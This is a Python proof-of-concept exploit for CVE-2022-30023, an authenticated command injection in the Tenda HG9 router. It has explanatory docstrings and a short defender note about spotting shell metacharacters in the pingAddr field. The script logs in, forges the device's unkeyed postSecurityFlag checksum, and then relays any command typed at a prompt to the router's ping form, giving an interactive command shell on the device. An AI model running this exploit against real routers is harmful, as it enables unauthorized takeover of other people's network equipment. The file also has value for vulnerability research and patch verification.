POC / exploit.py PY
import requests
import argparse
import re
from urllib.parse import urlencode, quote_plus


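def parseArgs():
	"""Parse the command line: the device URL and the router login to use.

	Returns the argparse namespace with ``url``, ``user`` and ``password``.

	All three options are mandatory. The original declarations combined
	``required=True`` with ``default=...`` and ``nargs='?'``: the defaults
	could never apply, and a flag given without a value (``-u`` alone) was
	accepted and stored as ``None``, which only failed later during string
	concatenation. Each flag now needs exactly one value and argparse
	rejects the call otherwise.
	"""
	parser = argparse.ArgumentParser(description='CVE-2022-30023 - Tenda HG9 Authenticated Command Injection By Thiago Pontes (Haniwa0x01)')
	parser.add_argument('-u', '--url', type=str, required=True, help='url address')
	parser.add_argument('-U', '--user', required=True, help='Username to login to the Router')
	# NOTE: a password passed as an argument is visible in the process list
	# and in shell history on the machine running this script.
	parser.add_argument('-P', '--password', required=True, help='Password to login to the Router')
	return parser.parse_args()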


def hash(inputVal):
	"""Append the ``postSecurityFlag`` checksum field to a form body.

	The body is summed as big-endian 32-bit words; a trailing group of one
	to three characters is taken as the high-order bytes of a final word.
	The sum is folded once onto its low 16 bits and complemented, and the
	result is appended as ``postSecurityFlag=<n>``. The field is glued on
	directly, so ``inputVal`` is expected to end with ``&``.

	The value is a function of the body alone; no key, nonce or session
	secret goes into it. Anyone who can build the body can build the flag,
	so it can catch a mangled request at most and is not a control against
	forged ones. Presumably the device's web server verifies this field;
	that check is not visible in this file.

	NOTE: this name shadows the builtin ``hash`` for the whole module.
	"""
	size = len(inputVal)
	whole = size - (size % 4)
	total = 0

	# Complete 4-character groups, most significant byte first.
	for start in range(0, whole, 4):
		b0, b1, b2, b3 = (ord(ch) for ch in inputVal[start:start + 4])
		total += (b0 << 24) + (b1 << 16) + (b2 << 8) + b3

	# Leftover 1-3 characters fill the top bytes of one last word.
	for shift, ch in zip((24, 16, 8), inputVal[whole:]):
		total += ord(ch) << shift

	# Single fold; whatever still overflows 16 bits is discarded by the mask.
	folded = ((total & 0xffff) + (total >> 16)) & 0xffff
	flag = folded ^ 0xffff

	return inputVal + "postSecurityFlag=" + str(flag)

def login(host, data):
	"""Post the login form and report whether the session is authenticated.

	``data`` is the already-built form body (checksum field included) and
	is sent as-is to ``/boaform/admin/formLogin``.

	Returns the ``requests.Session`` on success, or the string ``"false"``
	on failure. Callers compare against that string, so the return value
	must not be used as a truth value.

	Success is inferred only from the text "BroadBand Device Webserver"
	appearing in the response body; the HTTP status is not checked. No
	timeout is passed, so the call can block for as long as the device
	keeps the connection open.
	"""
	session = requests.Session()
	response = session.post(host + "/boaform/admin/formLogin", data=data)

	if "BroadBand Device Webserver" not in response.text:
		print("[!]: Not logged!!!")
		return "false"

	print("[!]: Logged!")
	return session

def logout(host, req):
	"""End the authenticated session by posting the logout form.

	``req`` is the session returned by ``login``. The response is ignored
	and nothing is returned. Unlike the other requests in this file, the
	body is sent without a ``postSecurityFlag`` field.
	"""
	logout_url = host + "/boaform/admin/formLogout"
	req.post(logout_url, data="save=Logout&submit-url=%2Flogin.asp")


def exec(host, payload, req):
	"""Send one ping-form request carrying ``payload`` and print the reply.

	The request is an authenticated POST to ``/boaform/formPing`` whose
	``pingAddr`` field is ``;`` followed by ``payload``. Per the CVE
	description in this file (authenticated command injection), the issue
	is that this field is not restricted to an address on the device side.

	For defenders: a ping target has no reason to contain ``;`` or other
	shell metacharacters, so a ``pingAddr`` value that does is the thing
	to look for in proxy or management-interface logs. The fix class is
	server-side validation of the field as an IP address or hostname.

	The text between ``<body><pre>`` and the form button is printed. If
	that marker is missing from the response, the ``[0]`` index raises
	IndexError.

	NOTE: this name shadows the builtin ``exec`` for the whole module.
	NOTE: ``submit-url`` is already percent-encoded and ``urlencode``
	encodes it a second time (``%252Fping.asp``).
	"""
	form = {
		'pingAddr': f';{payload}',
		'wanif': '65535',
		'submit-url': '%2Fping.asp',
	}
	# The checksum helper appends its field directly, hence the trailing "&".
	body = hash(urlencode(form, quote_via=quote_plus) + "&")

	html = req.post(host + "/boaform/formPing", data=body).text
	matches = re.findall(r"<body><pre>(.*)<form><input type=button value=", html, re.DOTALL)
	print(matches[0])

'''
#   Exploit for CVE-2022-30023             #
#   - Thiago Pontes (Haniwa0x01)           #
'''
if __name__ == "__main__":
	# Flow: parse arguments, log in once, then relay each line typed at the
	# prompt to the ping form until Ctrl-C, which logs the session out.
	cli = parseArgs()
	target = cli.url

	# NOTE: user and password are interpolated without URL-encoding, so a
	# value containing "&", "=" or "%" changes the shape of the form body.
	login_body = hash(f"username={cli.user}&password={cli.password}&save=Login&submit-url=%2Fadmin%2Flogin.asp&")
	session = login(target, login_body)

	# login() signals failure with the string "false", not a boolean.
	if session != "false":
		while True:
			try:
				exec(target, input("[CMD]: "), session)
			except KeyboardInterrupt:
				logout(target, session)
				break
	else:
		print("[!]: Login Error")